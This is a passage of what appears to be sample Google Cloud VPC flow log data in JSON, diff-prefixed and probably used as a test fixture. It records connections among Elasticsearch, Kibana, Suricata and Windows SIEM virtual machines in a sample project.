+{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"67.43.156.13","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.168.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"67.43.156.13","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.168.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"67.43.156.13","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"67.43.156.13","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"67.43.156.13","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.168.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03: